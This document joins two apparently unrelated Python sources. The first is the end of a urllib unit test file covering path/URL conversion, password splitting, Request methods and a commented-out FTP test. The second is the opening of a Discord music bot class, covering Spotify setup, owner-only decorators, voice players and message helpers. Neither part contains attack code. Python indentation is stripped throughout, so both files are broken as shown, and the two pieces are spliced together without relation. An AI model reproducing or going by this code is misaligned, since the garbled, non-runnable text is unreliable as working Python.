expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
                             'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.parse.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.parse.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.parse.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.parse.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.parse.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.parse.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.parse.splitpasswd('user:a:b'))
self.assertEqual(('user', 'a b'),urllib.parse.splitpasswd('user:a b'))
self.assertEqual(('user 2', 'ab'),urllib.parse.splitpasswd('user 2:ab'))
self.assertEqual(('user+1', 'a+b'),urllib.parse.splitpasswd('user+1:a+b'))
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work ok, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_6593 | import os
import sys
import time
import shlex
import shutil
import random
import inspect
import logging
import asyncio
import pathlib
import traceback
import math
import re
import aiohttp
import discord
import colorlog
from io import BytesIO, StringIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from collections import defaultdict
from discord.enums import ChannelType
from . import exceptions
from . import downloader
from .playlist import Playlist
from .player import MusicPlayer
from .entry import StreamPlaylistEntry
from .opus_loader import load_opus_lib
from .config import Config, ConfigDefaults
from .permissions import Permissions, PermissionsDefaults
from .aliases import Aliases, AliasesDefault
from .constructs import SkipState, Response
from .utils import (
load_file,
write_file,
fixg,
ftimedelta,
_func_,
_get_variable,
format_song_duration,
)
from .spotify import Spotify
from .json import Json
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
from typing import Optional
load_opus_lib()
log = logging.getLogger(__name__)
intents = discord.Intents.all()
intents.typing = False
intents.presences = False
class MusicBot(discord.Client):
def __init__(self, config_file=None, perms_file=None, aliases_file=None):
try:
sys.stdout.write("\x1b]2;MusicBot {}\x07".format(BOTVERSION))
except:
pass
print()
if config_file is None:
config_file = ConfigDefaults.options_file
if perms_file is None:
perms_file = PermissionsDefaults.perms_file
if aliases_file is None:
aliases_file = AliasesDefault.aliases_file
self.players = {}
self.exit_signal = None
self.init_ok = False
self.cached_app_info = None
self.last_status = None
self.config = Config(config_file)
self._setup_logging()
self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
self.str = Json(self.config.i18n_file)
if self.config.usealias:
self.aliases = Aliases(aliases_file)
self.blacklist = set(load_file(self.config.blacklist_file))
self.autoplaylist = load_file(self.config.auto_playlist_file)
self.aiolocks = defaultdict(asyncio.Lock)
self.downloader = downloader.Downloader(download_folder="audio_cache")
log.info("Starting MusicBot {}".format(BOTVERSION))
if not self.autoplaylist:
log.warning("Autoplaylist is empty, disabling.")
self.config.auto_playlist = False
else:
log.info(
"Loaded autoplaylist with {} entries".format(len(self.autoplaylist))
)
if self.blacklist:
log.debug("Loaded blacklist with {} entries".format(len(self.blacklist)))
# TODO: Do these properly
ssd_defaults = {
"last_np_msg": None,
"auto_paused": False,
"availability_paused": False,
}
self.server_specific_data = defaultdict(ssd_defaults.copy)
super().__init__(intents=intents)
self.http.user_agent = "MusicBot/%s" % BOTVERSION
self.aiosession = aiohttp.ClientSession(
loop=self.loop, headers={"User-Agent": self.http.user_agent}
)
self.spotify = None
if self.config._spotify:
try:
self.spotify = Spotify(
self.config.spotify_clientid,
self.config.spotify_clientsecret,
aiosession=self.aiosession,
loop=self.loop,
)
if not self.spotify.token:
log.warning("Spotify did not provide us with a token. Disabling.")
self.config._spotify = False
else:
log.info(
"Authenticated with Spotify successfully using client ID and secret."
)
except exceptions.SpotifyError as e:
log.warning(
"There was a problem initialising the connection to Spotify. Is your client ID and secret correct? Details: {0}. Continuing anyway in 5 seconds...".format(
e
)
)
self.config._spotify = False
time.sleep(5) # make sure they see the problem
else:
try:
log.warning(
"The config did not have Spotify app credentials, attempting to use guest mode."
)
self.spotify = Spotify(
None, None, aiosession=self.aiosession, loop=self.loop
)
if not self.spotify.token:
log.warning("Spotify did not provide us with a token. Disabling.")
self.config._spotify = False
else:
log.info(
"Authenticated with Spotify successfully using guest mode."
)
self.config._spotify = True
except exceptions.SpotifyError as e:
log.warning(
"There was a problem initialising the connection to Spotify using guest mode. Details: {0}.".format(
e
)
)
self.config._spotify = False
# TODO: Add some sort of `denied` argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable("message")
if not orig_msg or orig_msg.author.id == self.config.owner_id:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError(
"Only the owner can use this command.", expire_in=30
)
return wrapper
def dev_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
orig_msg = _get_variable("message")
if str(orig_msg.author.id) in self.config.dev_ids:
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError(
"Only dev users can use this command.", expire_in=30
)
wrapper.dev_cmd = True
return wrapper
def ensure_appinfo(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
await self._cache_app_info()
# noinspection PyCallingNonCallable
return await func(self, *args, **kwargs)
return wrapper
def _get_owner(self, *, server=None, voice=False):
return discord.utils.find(
lambda m: m.id == self.config.owner_id and (m.voice if voice else True),
server.members if server else self.get_all_members(),
)
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
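        # Best-effort cache removal: try to delete the folder outright; if that
        # fails, rename it aside (path + "__") and retry the delete, restoring the
        # original name if the retry also fails.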
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + "__")
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + "__", path)
return False
return True
def _setup_logging(self):
if len(logging.getLogger(__package__).handlers) > 1:
log.debug("Skipping logger setup, already set up")
return
shandler = logging.StreamHandler(stream=sys.stdout)
sformatter = colorlog.LevelFormatter(
fmt={
"DEBUG": "{log_color}[{levelname}:{module}] {message}",
"INFO": "{log_color}{message}",
"WARNING": "{log_color}{levelname}: {message}",
"ERROR": "{log_color}[{levelname}:{module}] {message}",
"CRITICAL": "{log_color}[{levelname}:{module}] {message}",
"EVERYTHING": "{log_color}[{levelname}:{module}] {message}",
"NOISY": "{log_color}[{levelname}:{module}] {message}",
"VOICEDEBUG": "{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}",
"FFMPEG": "{log_color}[{levelname}:{module}][{relativeCreated:.9f}] {message}",
},
log_colors={
"DEBUG": "cyan",
"INFO": "white",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "bold_red",
"EVERYTHING": "white",
"NOISY": "white",
"FFMPEG": "bold_purple",
"VOICEDEBUG": "purple",
},
style="{",
datefmt="",
)
shandler.setFormatter(sformatter)
shandler.setLevel(self.config.debug_level)
logging.getLogger(__package__).addHandler(shandler)
log.debug("Set logging level to {}".format(self.config.debug_level_str))
if self.config.debug_mode:
dlogger = logging.getLogger("discord")
dlogger.setLevel(logging.DEBUG)
dhandler = logging.FileHandler(
filename="logs/discord.log", encoding="utf-8", mode="w"
)
dhandler.setFormatter(
logging.Formatter("{asctime}:{levelname}:{name}: {message}", style="{")
)
dlogger.addHandler(dhandler)
@staticmethod
def _check_if_empty(
vchannel: discord.abc.GuildChannel, *, excluding_me=True, excluding_deaf=False
):
def check(member):
if excluding_me and member == vchannel.guild.me:
return False
if excluding_deaf and any([member.deaf, member.self_deaf]):
return False
if member.bot:
return False
return True
return not sum(1 for m in vchannel.members if check(m))
async def _join_startup_channels(self, channels, *, autosummon=True):
joined_servers = set()
channel_map = {c.guild: c for c in channels}
def _autopause(player):
if self._check_if_empty(player.voice_client.channel):
log.info("Initial autopause in empty channel")
player.pause()
self.server_specific_data[player.voice_client.channel.guild][
"auto_paused"
] = True
for guild in self.guilds:
if guild.unavailable or guild in channel_map:
continue
if guild.me.voice:
log.info(
"Found resumable voice channel {0.guild.name}/{0.name}".format(
guild.me.voice.channel
)
)
channel_map[guild] = guild.me.voice.channel
if autosummon:
owner = self._get_owner(server=guild, voice=True)
if owner:
log.info('Found owner in "{}"'.format(owner.voice.channel.name))
channel_map[guild] = owner.voice.channel
for guild, channel in channel_map.items():
if guild in joined_servers:
log.info(
'Already joined a channel in "{}", skipping'.format(guild.name)
)
continue
if channel and isinstance(channel, discord.VoiceChannel):
log.info("Attempting to join {0.guild.name}/{0.name}".format(channel))
chperms = channel.permissions_for(guild.me)
if not chperms.connect:
log.info(
'Cannot join channel "{}", no permission.'.format(channel.name)
)
continue
elif not chperms.speak:
log.info(
'Will not join channel "{}", no permission to speak.'.format(
channel.name
)
)
continue
try:
player = await self.get_player(
channel, create=True, deserialize=self.config.persistent_queue
)
joined_servers.add(guild)
log.info("Joined {0.guild.name}/{0.name}".format(channel))
if player.is_stopped:
player.play()
if self.config.auto_playlist:
if self.config.auto_pause:
player.once("play", lambda player, **_: _autopause(player))
if not player.playlist.entries:
await self.on_player_finished_playing(player)
except Exception:
log.debug(
"Error joining {0.guild.name}/{0.name}".format(channel),
exc_info=True,
)
log.error("Failed to join {0.guild.name}/{0.name}".format(channel))
elif channel:
log.warning(
"Not joining {0.guild.name}/{0.name}, that's a text channel.".format(
channel
)
)
else:
log.warning("Invalid channel thing: {}".format(channel))
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message, quiet=True)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
if msg.guild.me.voice:
vc = msg.guild.me.voice.channel
else:
vc = None
# If we've connected to a voice chat and we're in the same voice channel
if not vc or (msg.author.voice and vc == msg.author.voice.channel):
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)"
% vc.name,
expire_in=30,
)
async def _cache_app_info(self, *, update=False):
if not self.cached_app_info and not update and self.user.bot:
log.debug("Caching app info")
self.cached_app_info = await self.application_info()
return self.cached_app_info
async def remove_from_autoplaylist(
self, song_url: str, *, ex: Exception = None, delete_from_ap=False
):
if song_url not in self.autoplaylist:
log.debug('URL "{}" not in autoplaylist, ignoring'.format(song_url))
return
async with self.aiolocks[_func_()]:
self.autoplaylist.remove(song_url)
log.info(
"Removing unplayable song from session autoplaylist: %s" % song_url
)
with open(
self.config.auto_playlist_removed_file, "a", encoding="utf8"
) as f:
f.write(
"# Entry removed {ctime}\n"
"# Reason: {ex}\n"
"{url}\n\n{sep}\n\n".format(
ctime=time.ctime(),
ex=str(ex).replace(
"\n", "\n#" + " " * 10
), # 10 spaces to line up with # Reason:
url=song_url,
sep="#" * 32,
)
)
if delete_from_ap:
log.info("Updating autoplaylist")
write_file(self.config.auto_playlist_file, self.autoplaylist)
@ensure_appinfo
async def generate_invite_link(
self, *, permissions=discord.Permissions(70380544), guild=None
):
return discord.utils.oauth_url(
self.cached_app_info.id, permissions=permissions, guild=guild
)
async def get_voice_client(self, channel: discord.abc.GuildChannel):
if isinstance(channel, discord.Object):
channel = self.get_channel(channel.id)
if not isinstance(channel, discord.VoiceChannel):
raise AttributeError("Channel passed must be a voice channel")
if channel.guild.voice_client:
return channel.guild.voice_client
else:
client = await channel.connect(timeout=60, reconnect=True)
await channel.guild.change_voice_state(channel=channel, self_mute=False, self_deaf=True)
return client
async def disconnect_voice_client(self, guild):
vc = self.voice_client_in(guild)
if not vc:
return
if guild.id in self.players:
self.players.pop(guild.id).kill()
await vc.disconnect()
async def disconnect_all_voice_clients(self):
for vc in list(self.voice_clients).copy():
await self.disconnect_voice_client(vc.channel.guild)
def get_player_in(self, guild: discord.Guild) -> Optional[MusicPlayer]:
return self.players.get(guild.id)
async def get_player(
self, channel, create=False, *, deserialize=False
) -> MusicPlayer:
guild = channel.guild
async with self.aiolocks[_func_() + ":" + str(guild.id)]:
if deserialize:
voice_client = await self.get_voice_client(channel)
player = await self.deserialize_queue(guild, voice_client)
if player:
log.debug(
"Created player via deserialization for guild %s with %s entries",
guild.id,
len(player.playlist),
)
# Since deserializing only happens when the bot starts, I should never need to reconnect
return self._init_player(player, guild=guild)
if guild.id not in self.players:
if not create:
raise exceptions.CommandError(
"The bot is not in a voice channel. "
"Use %ssummon to summon it to your voice channel."
% self.config.command_prefix
)
voice_client = await self.get_voice_client(channel)
playlist = Playlist(self)
player = MusicPlayer(self, voice_client, playlist)
self._init_player(player, guild=guild)
return self.players[guild.id]
def _init_player(self, player, *, guild=None):
player = (
player.on("play", self.on_player_play)
.on("resume", self.on_player_resume)
.on("pause", self.on_player_pause)
.on("stop", self.on_player_stop)
.on("finished-playing", self.on_player_finished_playing)
.on("entry-added", self.on_player_entry_added)
.on("error", self.on_player_error)
)
player.skip_state = SkipState()
if guild:
self.players[guild.id] = player
return player
async def on_player_play(self, player, entry):
log.debug("Running on_player_play")
await self.update_now_playing_status(entry)
player.skip_state.reset()
        # This is the one event where it's ok to serialize autoplaylist entries
await self.serialize_queue(player.voice_client.channel.guild)
if self.config.write_current_song:
await self.write_current_song(player.voice_client.channel.guild, entry)
channel = entry.meta.get("channel", None)
author = entry.meta.get("author", None)
if channel and author:
author_perms = self.permissions.for_user(author)
if (
author not in player.voice_client.channel.members
and author_perms.skip_when_absent
):
newmsg = self.str.get(
"on_player_play-onChannel_authorNotInChannel_skipWhenAbsent",
"Skipping next song in {channel}: {title} added by {author} as queuer not in voice!",
).format(
channel=player.voice_client.channel.name,
title=entry.title,
author=entry.meta["author"].name,
)
player.skip()
elif self.config.now_playing_mentions:
newmsg = self.str.get(
"on_player_play-onChannel_playingMention",
"{author} - your song {title} is now playing in {channel}!",
).format(
author=entry.meta["author"].mention,
title=entry.title,
channel=player.voice_client.channel.name,
)
else:
newmsg = self.str.get(
"on_player_play-onChannel",
"Now playing in {channel}: {title} added by {author}!",
).format(
channel=player.voice_client.channel.name,
title=entry.title,
author=entry.meta["author"].name,
)
else:
# no author (and channel), it's an autoplaylist (or autostream from my other PR) entry.
newmsg = self.str.get(
"on_player_play-onChannel_noAuthor_autoplaylist",
"Now playing automatically added entry {title} in {channel}!",
).format(title=entry.title, channel=player.voice_client.channel.name)
if newmsg:
if self.config.dm_nowplaying and author:
await self.safe_send_message(author, newmsg)
return
if self.config.no_nowplaying_auto and not author:
return
guild = player.voice_client.guild
last_np_msg = self.server_specific_data[guild]["last_np_msg"]
if self.config.nowplaying_channels:
for potential_channel_id in self.config.nowplaying_channels:
potential_channel = self.get_channel(potential_channel_id)
if potential_channel and potential_channel.guild == guild:
channel = potential_channel
break
if channel:
pass
elif not channel and last_np_msg:
channel = last_np_msg.channel
else:
log.debug("no channel to put now playing message into")
return
# send it in specified channel
self.server_specific_data[guild][
"last_np_msg"
] = await self.safe_send_message(channel, newmsg)
# TODO: Check channel voice state?
async def on_player_resume(self, player, entry, **_):
log.debug("Running on_player_resume")
await self.update_now_playing_status(entry)
async def on_player_pause(self, player, entry, **_):
log.debug("Running on_player_pause")
await self.update_now_playing_status(entry, True)
# await self.serialize_queue(player.voice_client.channel.guild)
async def on_player_stop(self, player, **_):
log.debug("Running on_player_stop")
await self.update_now_playing_status()
async def on_player_finished_playing(self, player, **_):
log.debug("Running on_player_finished_playing")
# delete last_np_msg somewhere if we have cached it
if self.config.delete_nowplaying:
guild = player.voice_client.guild
last_np_msg = self.server_specific_data[guild]["last_np_msg"]
if last_np_msg:
await self.safe_delete_message(last_np_msg)
def _autopause(player):
if self._check_if_empty(player.voice_client.channel):
log.info("Player finished playing, autopaused in empty channel")
player.pause()
self.server_specific_data[player.voice_client.channel.guild][
"auto_paused"
] = True
if (
not player.playlist.entries
and not player.current_entry
and self.config.auto_playlist
):
if not player.autoplaylist:
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("No playable songs in the autoplaylist, disabling.")
self.config.auto_playlist = False
else:
log.debug(
"No content in current autoplaylist. Filling with new music..."
)
player.autoplaylist = list(self.autoplaylist)
while player.autoplaylist:
if self.config.auto_playlist_random:
random.shuffle(player.autoplaylist)
song_url = random.choice(player.autoplaylist)
else:
song_url = player.autoplaylist[0]
player.autoplaylist.remove(song_url)
info = {}
try:
info = await self.downloader.extract_info(
player.playlist.loop, song_url, download=False, process=False
)
except downloader.youtube_dl.utils.DownloadError as e:
if "YouTube said:" in e.args[0]:
# url is bork, remove from list and put in removed list
log.error("Error processing youtube url:\n{}".format(e.args[0]))
else:
# Probably an error from a different extractor, but I've only seen youtube's
log.error(
'Error processing "{url}": {ex}'.format(url=song_url, ex=e)
)
await self.remove_from_autoplaylist(
song_url, ex=e, delete_from_ap=self.config.remove_ap
)
continue
except Exception as e:
log.error(
'Error processing "{url}": {ex}'.format(url=song_url, ex=e)
)
                    log.exception(e)
self.autoplaylist.remove(song_url)
continue
if info.get("entries", None): # or .get('_type', '') == 'playlist'
log.debug(
"Playlist found but is unsupported at this time, skipping."
)
# TODO: Playlist expansion
# Do I check the initial conditions again?
# not (not player.playlist.entries and not player.current_entry and self.config.auto_playlist)
if self.config.auto_pause:
player.once("play", lambda player, **_: _autopause(player))
try:
await player.playlist.add_entry(
song_url, channel=None, author=None, head=False
)
except exceptions.ExtractionError as e:
log.error("Error adding song from autoplaylist: {}".format(e))
log.debug("", exc_info=True)
continue
break
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("No playable songs in the autoplaylist, disabling.")
self.config.auto_playlist = False
else: # Don't serialize for autoplaylist events
await self.serialize_queue(player.voice_client.channel.guild)
if not player.is_stopped and not player.is_dead:
player.play(_continue=True)
async def on_player_entry_added(self, player, playlist, entry, **_):
log.debug("Running on_player_entry_added")
if entry.meta.get("author") and entry.meta.get("channel"):
await self.serialize_queue(player.voice_client.channel.guild)
async def on_player_error(self, player, entry, ex, **_):
if "channel" in entry.meta:
await self.safe_send_message(
entry.meta["channel"], "```\nError while playing:\n{}\n```".format(ex)
)
else:
log.exception("Player error", exc_info=ex)
async def update_now_playing_status(self, entry=None, is_paused=False):
game = None
if not self.config.status_message:
if self.user.bot:
activeplayers = sum(1 for p in self.players.values() if p.is_playing)
if activeplayers > 1:
game = discord.Game(
type=0, name="music on %s guilds" % activeplayers
)
entry = None
elif activeplayers == 1:
player = discord.utils.get(self.players.values(), is_playing=True)
entry = player.current_entry
if entry:
prefix = u"\u275A\u275A " if is_paused else ""
name = u"{}{}".format(prefix, entry.title)[:128]
game = discord.Game(type=0, name=name)
else:
game = discord.Game(type=0, name=self.config.status_message.strip()[:128])
async with self.aiolocks[_func_()]:
if game != self.last_status:
await self.change_presence(activity=game)
self.last_status = game
async def update_now_playing_message(self, guild, message, *, channel=None):
lnp = self.server_specific_data[guild]["last_np_msg"]
m = None
if message is None and lnp:
await self.safe_delete_message(lnp, quiet=True)
elif lnp: # If there was a previous lp message
oldchannel = lnp.channel
if lnp.channel == oldchannel: # If we have a channel to update it in
async for lmsg in lnp.channel.history(limit=1):
if lmsg != lnp and lnp: # If we need to resend it
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else:
m = await self.safe_edit_message(
lnp, message, send_if_fail=True, quiet=False
)
elif channel: # If we have a new channel to send it to
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else: # we just resend it in the old channel
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(oldchannel, message, quiet=True)
elif channel: # No previous message
m = await self.safe_send_message(channel, message, quiet=True)
self.server_specific_data[guild]["last_np_msg"] = m
async def serialize_queue(self, guild, *, dir=None):
"""
Serialize the current queue for a server's player to json.
"""
player = self.get_player_in(guild)
if not player:
return
if dir is None:
dir = "data/%s/queue.json" % guild.id
async with self.aiolocks["queue_serialization" + ":" + str(guild.id)]:
log.debug("Serializing queue for %s", guild.id)
with open(dir, "w", encoding="utf8") as f:
f.write(player.serialize(sort_keys=True))
async def serialize_all_queues(self, *, dir=None):
coros = [self.serialize_queue(s, dir=dir) for s in self.guilds]
await asyncio.gather(*coros, return_exceptions=True)
async def deserialize_queue(
self, guild, voice_client, playlist=None, *, dir=None
) -> MusicPlayer:
"""
Deserialize a saved queue for a server into a MusicPlayer. If no queue is saved, returns None.
"""
if playlist is None:
playlist = Playlist(self)
if dir is None:
dir = "data/%s/queue.json" % guild.id
async with self.aiolocks["queue_serialization" + ":" + str(guild.id)]:
if not os.path.isfile(dir):
return None
log.debug("Deserializing queue for %s", guild.id)
with open(dir, "r", encoding="utf8") as f:
data = f.read()
return MusicPlayer.from_json(data, self, voice_client, playlist)
async def write_current_song(self, guild, entry, *, dir=None):
"""
Writes the current song to file
"""
player = self.get_player_in(guild)
if not player:
return
if dir is None:
dir = "data/%s/current.txt" % guild.id
async with self.aiolocks["current_song" + ":" + str(guild.id)]:
log.debug("Writing current song for %s", guild.id)
with open(dir, "w", encoding="utf8") as f:
f.write(entry.title)
@ensure_appinfo
async def _on_ready_sanity_checks(self):
# Ensure folders exist
await self._scheck_ensure_env()
# Server permissions check
await self._scheck_server_permissions()
# playlists in autoplaylist
await self._scheck_autoplaylist()
# config/permissions async validate?
await self._scheck_configs()
async def _scheck_ensure_env(self):
log.debug("Ensuring data folders exist")
for guild in self.guilds:
pathlib.Path("data/%s/" % guild.id).mkdir(exist_ok=True)
with open("data/server_names.txt", "w", encoding="utf8") as f:
for guild in sorted(self.guilds, key=lambda s: int(s.id)):
f.write("{:<22} {}\n".format(guild.id, guild.name))
if not self.config.save_videos and os.path.isdir(AUDIO_CACHE_PATH):
if self._delete_old_audiocache():
log.debug("Deleted old audio cache")
else:
log.debug("Could not delete old audio cache, moving on.")
async def _scheck_server_permissions(self):
log.debug("Checking server permissions")
pass # TODO
async def _scheck_autoplaylist(self):
log.debug("Auditing autoplaylist")
pass # TODO
async def _scheck_configs(self):
log.debug("Validating config")
await self.config.async_validate(self)
log.debug("Validating permissions config")
await self.permissions.async_validate(self)
#######################################################################################################################
async def safe_send_message(self, dest, content, **kwargs):
tts = kwargs.pop("tts", False)
quiet = kwargs.pop("quiet", False)
expire_in = kwargs.pop("expire_in", 0)
allow_none = kwargs.pop("allow_none", True)
also_delete = kwargs.pop("also_delete", None)
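        # Illustrative call (keyword values here are made up): e.g.
        #   await self.safe_send_message(channel, "...", expire_in=30, quiet=True)
        # expire_in schedules deletion via _wait_delete_msg below; quiet downgrades
        # the warning logs to debug.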
msg = None
lfunc = log.debug if quiet else log.warning
try:
if content is not None or allow_none:
if isinstance(content, discord.Embed):
msg = await dest.send(embed=content)
else:
msg = await dest.send(content, tts=tts)
except discord.Forbidden:
lfunc('Cannot send message to "%s", no permission', dest.name)
except discord.NotFound:
lfunc('Cannot send message to "%s", invalid channel?', dest.name)
except discord.HTTPException:
if len(content) > DISCORD_MSG_CHAR_LIMIT:
lfunc(
"Message is over the message size limit (%s)",
DISCORD_MSG_CHAR_LIMIT,
)
else:
lfunc("Failed to send message")
log.noise(
"Got HTTPException trying to send message to %s: %s", dest, content
)
finally:
if msg and expire_in:
asyncio.ensure_future(self._wait_delete_msg(msg, expire_in))
if also_delete and isinstance(also_delete, discord.Message):
asyncio.ensure_future(self._wait_delete_msg(also_delete, expire_in))
return msg
